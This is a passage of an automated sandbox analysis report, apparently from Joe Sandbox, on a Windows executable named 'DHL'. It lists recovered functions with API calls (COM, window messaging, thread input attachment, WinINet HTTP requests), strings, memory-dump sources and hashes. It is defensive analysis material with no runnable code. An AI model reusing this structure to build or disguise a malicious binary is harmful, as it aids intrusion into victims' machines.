                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 707087890-567219261
                                                        • Opcode ID: 791898908201d1f472228ba28084709764c634b58bdffa41a9260ca34df40ccd
                                                        • Instruction ID: dc22e5bd724f6a0ff83835ac418d9f7989fae5aceaed5216ade285338184c49c
                                                        • Opcode Fuzzy Hash: 791898908201d1f472228ba28084709764c634b58bdffa41a9260ca34df40ccd
                                                        • Instruction Fuzzy Hash: 8E51AD32A011269BCB14DF6CD9509BEB3B5BF65764B214239F826E72C4DB38DD44C790
                                                        APIs
                                                        • CoInitialize.OLE32 ref: 00A23774
                                                        • CoUninitialize.OLE32 ref: 00A2377F
                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00A3FB78,?), ref: 00A237D9
                                                        • IIDFromString.OLE32(?,?), ref: 00A2384C
                                                        • VariantInit.OLEAUT32(?), ref: 00A238E4
                                                        • VariantClear.OLEAUT32(?), ref: 00A23936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                        • API String ID: 636576611-1287834457
                                                        • Opcode ID: 936110db65c4dfc829474fbdecf21ccfcd8c84dfcdf2dab5200ab40a155c7d8c
                                                        • Instruction ID: fefdf3b069dfd429b86721b368a0479f357a09cc29eec1675acfb2851bd0009e
                                                        • Opcode Fuzzy Hash: 936110db65c4dfc829474fbdecf21ccfcd8c84dfcdf2dab5200ab40a155c7d8c
                                                        • Instruction Fuzzy Hash: 5D61B272608321AFDB10DF68D949F6AB7F4EF86714F000829F5859B291D774EE48CB92
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00A133CF
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00A133F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-3080491070
                                                        • Opcode ID: d2e955a3eebcd29c5c69ff89930bbb618f85866c339a46fbd03a46189fa7542e
                                                        • Instruction ID: 73df3b6ba91288ca305b83cf0a8e23c4d8fd6df5ec491f83b22cb438cd9aa2bb
                                                        • Opcode Fuzzy Hash: d2e955a3eebcd29c5c69ff89930bbb618f85866c339a46fbd03a46189fa7542e
                                                        • Instruction Fuzzy Hash: E1518E32900219BADF15EBE0DE46EEEB779BF45740F108465F40972092EF212F98CBA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 1256254125-769500911
                                                        • Opcode ID: 02cd6fab163ebc9ec6fd3f0041b9bc70ad857f633f67cf17b87411a80eda3564
                                                        • Instruction ID: 2312dfce650a99a5305a4c3a0c65e4794487cc52566b1e4415557df739b23e5d
                                                        • Opcode Fuzzy Hash: 02cd6fab163ebc9ec6fd3f0041b9bc70ad857f633f67cf17b87411a80eda3564
                                                        • Instruction Fuzzy Hash: FD41C532A1112B9BCB105F7DDE905BE77B5ABA1B94F244629E421DB2C4E732CD81C7A0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A153A0
                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A15416
                                                        • GetLastError.KERNEL32 ref: 00A15420
                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00A154A7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: c5937081706eba174908ecdb2c6b0163bf01ad374a6bb77738891cdb583cbfb3
                                                        • Instruction ID: 5595a9fca681314c4e00994edea45bf9cc0c1844b66d60d57f6bf336e771a247
                                                        • Opcode Fuzzy Hash: c5937081706eba174908ecdb2c6b0163bf01ad374a6bb77738891cdb583cbfb3
                                                        • Instruction Fuzzy Hash: 9C314B39E00604DFD710DF68D884BEABBB9EF95315F148065E4059B292DB71DDC6CB90
                                                        APIs
                                                        • CreateMenu.USER32 ref: 00A33C79
                                                        • SetMenu.USER32(?,00000000), ref: 00A33C88
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A33D10
                                                        • IsMenu.USER32(?), ref: 00A33D24
                                                        • CreatePopupMenu.USER32 ref: 00A33D2E
                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A33D5B
                                                        • DrawMenuBar.USER32 ref: 00A33D63
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                        • String ID: 0$F
                                                        • API String ID: 161812096-3044882817
                                                        • Opcode ID: ac0f7814f7f986b0ada385433f0596bab850dfbd15fd4a7f2869e33bc2111d82
                                                        • Instruction ID: 2685999517d73c4670ad53dfe6287a92e5af9f24ec5fbea5c21d65baafcd1e11
                                                        • Opcode Fuzzy Hash: ac0f7814f7f986b0ada385433f0596bab850dfbd15fd4a7f2869e33bc2111d82
                                                        • Instruction Fuzzy Hash: 6E41577AA05209AFDF14CFA4DC84BAA7BB5FF49350F144429FA46A7360D730AA11CF94
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A33A9D
                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A33AA0
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00A33AC7
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A33AEA
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A33B62
                                                        • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A33BAC
                                                        • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A33BC7
                                                        • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A33BE2
                                                        • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A33BF6
                                                        • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A33C13
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$LongWindow
                                                        • String ID:
                                                        • API String ID: 312131281-0
                                                        • Opcode ID: a9e7767686eb7340d8689a546106cf4e5e474c04e9b6aa4442286e248851b5a1
                                                        • Instruction ID: b6cc9c5cd4770fe20be29bc7c8102c96eaa2f10fe4df97b46438d72e4e146ef5
                                                        • Opcode Fuzzy Hash: a9e7767686eb7340d8689a546106cf4e5e474c04e9b6aa4442286e248851b5a1
                                                        • Instruction Fuzzy Hash: 5B616C76900248AFDB10DFA8CC81EEE77F8EB49710F104199FA15E72A1D774AE46DB50
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A0B151
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B165
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00A0B16C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B17B
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00A0B18D
                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B1A6
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B1B8
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B1FD
                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B212
                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00A0A1E1,?,00000001), ref: 00A0B21D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 2884f3930e3429d2a7488c70f922844088aa1f33e7676216e53d64d9fb1b7c15
                                                        • Instruction ID: 4c1b309ebfbe42c00bbbb4fdb7f2004fd20efdbd8dfdb3fad2f6bd7c4725606c
                                                        • Opcode Fuzzy Hash: 2884f3930e3429d2a7488c70f922844088aa1f33e7676216e53d64d9fb1b7c15
                                                        • Instruction Fuzzy Hash: A6319372510208BFDF10DFA4EE45BAD7BA9BB65321F118505F905D61E0D7B49A828F70
                                                        APIs
                                                        • _free.LIBCMT ref: 009D2C94
                                                          • Part of subcall function 009D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000), ref: 009D29DE
                                                          • Part of subcall function 009D29C8: GetLastError.KERNEL32(00000000,?,009DD7D1,00000000,00000000,00000000,00000000,?,009DD7F8,00000000,00000007,00000000,?,009DDBF5,00000000,00000000), ref: 009D29F0
                                                        • _free.LIBCMT ref: 009D2CA0
                                                        • _free.LIBCMT ref: 009D2CAB
                                                        • _free.LIBCMT ref: 009D2CB6
                                                        • _free.LIBCMT ref: 009D2CC1
                                                        • _free.LIBCMT ref: 009D2CCC
                                                        • _free.LIBCMT ref: 009D2CD7
                                                        • _free.LIBCMT ref: 009D2CE2
                                                        • _free.LIBCMT ref: 009D2CED
                                                        • _free.LIBCMT ref: 009D2CFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 63310eabe3f783481451e30f1c91562ce90e6ae9e94767fd2d189d0719b5eb8b
                                                        • Instruction ID: 3c9ca2093af12bc9bff92253eed418f95e1e2d0f17d204dfb0c5d33fecebc3e9
                                                        • Opcode Fuzzy Hash: 63310eabe3f783481451e30f1c91562ce90e6ae9e94767fd2d189d0719b5eb8b
                                                        • Instruction Fuzzy Hash: D011B976140108BFCB02EF54D952DDD3BA5FF55350F4184A6F9485F322D631EE50AB90
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 009A1459
                                                        • OleUninitialize.OLE32(?,00000000), ref: 009A14F8
                                                        • UnregisterHotKey.USER32(?), ref: 009A16DD
                                                        • DestroyWindow.USER32(?), ref: 009E24B9
                                                        • FreeLibrary.KERNEL32(?), ref: 009E251E
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009E254B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: 8c5118692548e664cdcc80df089177b877494841eec5b84438b6b79704d7144c
                                                        • Instruction ID: 9f388cac3ec29e2781a2a5565e0d23e87dec2b3012548e28d5f006b84e290f41
                                                        • Opcode Fuzzy Hash: 8c5118692548e664cdcc80df089177b877494841eec5b84438b6b79704d7144c
                                                        • Instruction Fuzzy Hash: 81D15931701212CFCB1AEF15C999B69F7A8BF46710F1542ADF44AAB261DB30AD12CF90
                                                        APIs
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A17FAD
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A17FC1
                                                        • GetFileAttributesW.KERNEL32(?), ref: 00A17FEB
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A18005
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A18017
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A18060
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A180B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$AttributesFile
                                                        • String ID: *.*
                                                        • API String ID: 769691225-438819550
                                                        • Opcode ID: 50b63c4259af9e9dda19a6282acde6efcda51e5a491e0f9024d7e1545e8321e8
                                                        • Instruction ID: 8fc1fba72fbe4d19fb6fff319bd5354937c6243be183ab0bcdca79df4cde78a8
                                                        • Opcode Fuzzy Hash: 50b63c4259af9e9dda19a6282acde6efcda51e5a491e0f9024d7e1545e8321e8
                                                        • Instruction Fuzzy Hash: D9818D725082459BCB20EF54C844AEEB3F8BF89310F54585EF885DB290EB35DD85CB92
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 009A5C7A
                                                          • Part of subcall function 009A5D0A: GetClientRect.USER32(?,?), ref: 009A5D30
                                                          • Part of subcall function 009A5D0A: GetWindowRect.USER32(?,?), ref: 009A5D71
                                                          • Part of subcall function 009A5D0A: ScreenToClient.USER32(?,?), ref: 009A5D99
                                                        • GetDC.USER32 ref: 009E46F5
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009E4708
                                                        • SelectObject.GDI32(00000000,00000000), ref: 009E4716
                                                        • SelectObject.GDI32(00000000,00000000), ref: 009E472B
                                                        • ReleaseDC.USER32(?,00000000), ref: 009E4733
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009E47C4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: 02903e43d168c45386b63d0f78c36b1676d9fdf4632c5889ccf363b8d6dbcf0e
                                                        • Instruction ID: 43c15c2d64a4d72153106a20d863fa953c280cce0553bdf5cbc5717cf1b491dc
                                                        • Opcode Fuzzy Hash: 02903e43d168c45386b63d0f78c36b1676d9fdf4632c5889ccf363b8d6dbcf0e
                                                        • Instruction Fuzzy Hash: 1871E030500245EFCF22CF65CD84AAA7BB9FF4A360F144269FD955A1AAC3318C82DF90
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 00A135E4
                                                          • Part of subcall function 009A9CB3: _wcslen.LIBCMT ref: 009A9CBD
                                                        • LoadStringW.USER32(00A72390,?,00000FFF,?), ref: 00A1360A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: LoadString$_wcslen
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 4099089115-2391861430
                                                        • Opcode ID: 8b019399dd66ba15cbea2e64ba36a2c50241890816ed55659e0666a766c4e219
                                                        • Instruction ID: 504e94605161e2d743888f8cc0e720aee91f985247c34db8168dbb71c3e3487e
                                                        • Opcode Fuzzy Hash: 8b019399dd66ba15cbea2e64ba36a2c50241890816ed55659e0666a766c4e219
                                                        • Instruction Fuzzy Hash: C1515A72800219BADF15EBE0DD46EEEBB78FF45350F148125F109721A2EB311A99DBA0
                                                        APIs
                                                          • Part of subcall function 009B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009B9BB2
                                                          • Part of subcall function 009B912D: GetCursorPos.USER32(?), ref: 009B9141
                                                          • Part of subcall function 009B912D: ScreenToClient.USER32(00000000,?), ref: 009B915E
                                                          • Part of subcall function 009B912D: GetAsyncKeyState.USER32(00000001), ref: 009B9183
                                                          • Part of subcall function 009B912D: GetAsyncKeyState.USER32(00000002), ref: 009B919D
                                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00A38B6B
                                                        • ImageList_EndDrag.COMCTL32 ref: 00A38B71
                                                        • ReleaseCapture.USER32 ref: 00A38B77
                                                        • SetWindowTextW.USER32(?,00000000), ref: 00A38C12
                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A38C25
                                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00A38CFF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                        • API String ID: 1924731296-2107944366
                                                        • Opcode ID: 6e8dd8869b602881cc658d2eac70852bba70f898015f227059fe5dd45dd5d6b4
                                                        • Instruction ID: 11b5c20330fb8f28829c63b7e5248d808f9a2be9060c8f08aa40f9d81c3f66f5
                                                        • Opcode Fuzzy Hash: 6e8dd8869b602881cc658d2eac70852bba70f898015f227059fe5dd45dd5d6b4
                                                        • Instruction Fuzzy Hash: 2651BC71104300AFD700DF64DC96FAA77E4FB88714F000A2DF996A72E1CB74A945CBA2
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A1C272
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A1C29A
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A1C2CA
                                                        • GetLastError.KERNEL32 ref: 00A1C322
                                                        • SetEvent.KERNEL32(?), ref: 00A1C336
                                                        • InternetCloseHandle.WININET(00000000), ref: 00A1C341
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1464884217.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                        • Associated: 00000000.00000002.1464868271.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465028726.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465133098.0000000000A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1465163033.0000000000A74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9a0000_DHL.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 7ca9e1a86541eb17ccbc4b8ceae7659315eb66ee04eb533f72972a071d81bead
                                                        • Instruction ID: 348d91637a643fd92ad4d947ed8848def653a51c44ede2bff6daa975c3e13232
                                                        • Opcode Fuzzy Hash: 7ca9e1a86541eb17ccbc4b8ceae7659315eb66ee04eb533f72972a071d81bead
                                                        • Instruction Fuzzy Hash: 2A319CB1640308AFD721DFA58C88AEBBBFCEB49760B10851EF456E7200DB30DD858B61
                                                        APIs
